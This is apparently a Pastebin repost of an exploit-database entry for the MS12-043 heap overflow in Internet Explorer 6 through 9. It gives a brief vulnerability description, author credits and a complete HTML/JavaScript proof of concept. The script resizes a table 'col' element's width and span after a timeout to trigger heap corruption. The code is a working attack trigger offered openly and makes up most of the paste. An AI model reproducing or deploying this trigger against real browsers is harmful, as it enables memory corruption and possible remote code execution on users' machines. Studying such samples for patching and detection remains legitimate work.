Advertisement
The_KGB

MS Internet Explorer Heap Overflow (MS12-043)

Oct 10th, 2012
141
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.05 KB | None | 0 0
  1. Was sent this from a friend who randomly goes spelunking around exploit DBs.
  2. # Title : MS Internet Explorer Heap Overflow (MS12-043)
  3.  
  4. # Version : Internet Explorer 6 through 9
  5.  
  6. # Auther : Senator of Pirates
  7.  
  8. # Founders : Marshal Webb & Khalil Zhani
  9.  
  10. # E-Mail : Senator.of.Pirates.team [at] gmail.com
  11.  
  12. # FaceBook : /SenatorofPiratesInfo
  13.  
  14. Vulnerability :
  15. -------------
  16.  
  17. Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does
  18. not properly handle objects in
  19. memory, which allows remote attackers to execute arbitrary code by
  20. attempting to access a nonexistent
  21. object, leading to a heap-based buffer overflow, aka "Col Element
  22. Remote Code Execution Vulnerabilit".
  23.  
  24. Code :
  25. -----
  26.  
  27. <html>
  28. <body>
  29. <table style="table-layout:fixed" >
  30. <col id="132" width="41" span="1" >&nbsp </col>
  31. </table>
  32. <script>
  33.  
  34. function over_trigger() {
  35. var obj_col = document.getElementById("132");
  36. obj_col.width = "42765";
  37. obj_col.span = 1000;
  38. }
  39.  
  40. setTimeout("over_trigger();",1);
  41.  
  42. </script>
  43. </body>
  44. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement